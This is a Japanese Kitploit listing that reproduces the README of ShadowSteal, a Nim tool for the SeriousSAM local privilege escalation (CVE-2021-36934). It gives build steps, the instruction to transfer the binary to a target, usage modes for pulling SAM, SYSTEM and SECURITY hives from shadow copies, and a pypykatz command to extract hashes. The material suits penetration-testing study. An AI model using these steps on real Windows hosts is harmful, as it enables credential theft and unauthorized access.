Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ShadowSteal — CVE-2021-36934、SeriousSAM ローカル特権昇格を悪用するための純粋な Nim 実装 | Kitploit
ツール/GitHubGitHub/huskyhacks/shadowsteal
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミング
GitHubhuskyhacks/shadowsteal

ShadowSteal

CVE-2021-36934、SeriousSAM ローカル特権昇格を悪用するための純粋な Nim 実装

リポジトリを見る
210374年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ShadowSteal | CVE-2021-36934

CVE-2021-36934(SeriousSAM ローカル特権昇格 (LPE))を悪用するための純粋な Nim 実装。OPSEC セーフではありません... まだね ;)。このエクスプロイトの発見の功績は私にはありません。

Quick Start

Build with Docker

Docker のおかげで、ShadowSteal を始めるのがかつてないほど簡単になりました!Nim の依存関係をインストールするのが面倒ですか?大丈夫、任せてください!Python スクリプトを実行して Docker ビルド環境を作成し、バイナリをコンパイルしてホストに転送し、コンテナを停止します。

ホストに Docker をインストールし(OS ごとのインストール方法はドキュメントを参照)、メインディレクトリで ShadowSteal Python スクリプトを実行します:

root@kitploit:~
$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
root@kitploit:~
$ sudo python3 ShadowSteal.py && cd bin/ && ls -l

Build from Source

または、Nim とその依存関係をインストールしてソースからビルドします:

root@kitploit:~
$ sudo apt-get install nim
root@kitploit:~
$ nimble install zippy argparse winim

MinGW ツールチェーンがまだインストールされていない場合はインストールします。

root@kitploit:~
$ sudo apt-get install mingw-w64
root@kitploit:~
$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
root@kitploit:~
$ make && cd bin/ && ls -l

ターゲットに転送...

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h

Summary

Microsoft によるある見落としのため、最近の Windows ビルドでは通常のユーザーが ...\System32\config\ フォルダの内容に対して読み取り権限を持っています。これにより、低権限ユーザーが ...\System32\config 内の SAM、System、Security ファイルを読み取れることを意味します。

1.png

うわっ。これで何ができるのでしょうか?

非常に観察力のある研究者 (@jonasLyk に shout out!) は、Windows ホストが特定のシステム復元構成「ボリューム シャドウ コピー」を使用している場合、これらのファイルのバックアップコピーが保存され、Win32 デバイス名前空間を介してアクセス可能になることに気づきました。

2.png

3.png

SAM は通常、ホストの動作中はロックされているため、...\System32\config\ 内の SAM にアクセスすることは不可能です。しかし、これらのシャドウ ボリューム コピーは、この設定ミスのおかげでホスト上の任意のユーザーがアクセス可能です。すばらしい!

ShadowSteal

ShadowSteal は Nim で書かれたバイナリで、これらのシャドウ コピーから SAM、System、Security ファイルの列挙と持ち出しを自動化します。シャドウ コピーの可能な場所を反復処理し、ターゲットを見つけると、ファイルを zip 形式のディレクトリに抽出します(Bloodhound の出力をイメージ)。

4.png

Features:

  • 徹底したまたは迅速な列挙のための Triage モードと Bruteforce モード。
  • ターゲット資格情報の自動抽出と集約。
  • Jeff Beezy モード。(え、何?)
  • 簡単なコンパイルのための統合 Docker ビルド環境!
  • 利用可能なすべての HarddiskShadowCopy ロケーションを列挙し、動的に最大の番号を選択し、それらを悪用/抽出のターゲットにします。

6.png

画期的なものではなく、コードはハック的ですが、動作しますし、楽しいビルドでした!

Installing from Source

Nim のインストール:

root@kitploit:~
$ sudo apt-get install nim

依存関係のインストール:

root@kitploit:~
$ nimble install zippy argparse winim

MinGW ツールチェーンがまだインストールされていない場合はインストール:

root@kitploit:~
$ sudo apt-get install mingw-w64

64 ビット Windows 用にコンパイル:

root@kitploit:~
$ make

ターゲットに転送して実行!

Usage

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h
[*] ShadowSteal! Identifies and extracts credentials that can be stolen due to the SeriousSAM (CVE-2021-36934) exploit. Searches from high to low, defaults searching 100 to 1.

Usage:
   [options]

Options:
  -h, --help
  -t, --triage               [*] Triage mode. Quick enumeration, tries to find quick wins.
  -bf, --bruteforce          [*] Bruteforce mode. Enumerates the entire range of possible locations (512 to 1). Takes a bit.
  -b, --bezos                [?] Jeff Bezos Mode

Triage mode

場所のブルートフォースを 10 から 1 に制限し、試行ごとにデクリメントします。ほとんどの環境で高速かつ効果的です。

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -t

Bruteforce mode

可能なすべての場所 (512) を検索し、1 までデクリメントします。環境を徹底的に列挙するにはこれを試してください。数分かかります。

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -bf

Parsing Output

出力ディレクトリを攻撃ホストに転送し、Pypykatz でデータを抽出します。インストール:

root@kitploit:~
$ pip3 install pypykatz

Pypykatz の実行:

root@kitploit:~
$ pypykatz registry [yyyyMMddhhmm_SYSTEM] --sam [yyyyMMddhhmm_SAM] --security [yyyyMMddhhmm_SECURITY]

5.png

Release History

v.04.01 | the Docktastic update

簡単なプリパッケージ Docker ビルド環境を搭載!ShadowSteal.py スクリプトを実行するだけで、Docker 環境をセットアップし、バイナリをコンパイルし、ホストに転送し、ビルドコンテナを停止します。うまくいきます!(一部組み立てが必要、つまり実行には Docker が必要です)。

v.03.69 | the N I C E update

スリムで強力。最適化されたコンパイルオプションを追加。コンパイラ最適化によりパフォーマンスが大幅に向上し、完全なブルートフォースがほぼ瞬時に行われるようになりました。疑似 PR をくれた @orbitalgun に心から感謝します。あなたの家と名前に栄光あれ!

v.02 THE JEFF BEEZY UPDATE

  • Bruteforce モードと Triage モード
  • より良い検索アルゴリズム
  • コード整理
  • Jeff Beezy モード
  • 最初のリリースからの多くの教訓!

v.01 THE LAUNCHPAD RELEASE

さあ乗れよ、この大惨事が動き出す。このリリースは私の迅速なプロトタイプで、かなりひどかった lol。でも作るのはとても楽しかった! 機能:

  • 「動作する」コード

References

  • この CVE の最初の開示者: @jonasLyk
  • CVE リファレンスページ
  • 歌詞クレジット: Bezos I by Bo Burnham. All Rights Reserved.

Disclaimer

  • 法的かつ倫理的な使用のみ。

7.png

ツールをダウンロード